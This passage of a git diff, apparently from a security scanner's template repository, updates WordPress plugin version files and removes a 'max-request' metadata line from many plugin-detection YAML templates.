http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 209 files changed, 9 insertions(+), 209 deletions(-) diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index da3a40311f..4f3470c166 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.4.0.1 \ No newline at end of file +4.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/breeze.txt b/helpers/wordpress/plugins/breeze.txt index 46d9844b78..7cc919f925 100644 --- a/helpers/wordpress/plugins/breeze.txt +++ b/helpers/wordpress/plugins/breeze.txt @@ -1 +1 @@ -2.0.26 \ No newline at end of file +2.0.27 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index edb1d397cf..885bc9f72d 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.8.0 \ No newline at end of file +5.8.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index 06424fbc0c..c74537df10 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.24.5 \ No newline at end of file +1.24.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index 9c93823dd7..d5ace4f343 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.6.27 \ No newline at end of file +3.6.28 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index b4cf44c8dc..77b0c06adb 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.4.0 \ No newline at end of file +9.4.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/really-simple-ssl.txt b/helpers/wordpress/plugins/really-simple-ssl.txt index c60ebc1807..ec997167de 100644 --- a/helpers/wordpress/plugins/really-simple-ssl.txt +++ b/helpers/wordpress/plugins/really-simple-ssl.txt @@ -1 +1 @@ -7.0.5 \ No newline at end of file +7.0.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/updraftplus.txt b/helpers/wordpress/plugins/updraftplus.txt index fa994bd719..f4ce2033d5 100644 --- a/helpers/wordpress/plugins/updraftplus.txt +++ b/helpers/wordpress/plugins/updraftplus.txt @@ -1 +1 @@ -1.23.6 \ No newline at end of file +1.23.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-optimize.txt b/helpers/wordpress/plugins/wp-optimize.txt index 02686bc47e..b150cb709d 100644 --- a/helpers/wordpress/plugins/wp-optimize.txt +++ b/helpers/wordpress/plugins/wp-optimize.txt @@ -1 +1 @@ -3.2.15 \ No newline at end of file +3.2.16 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ 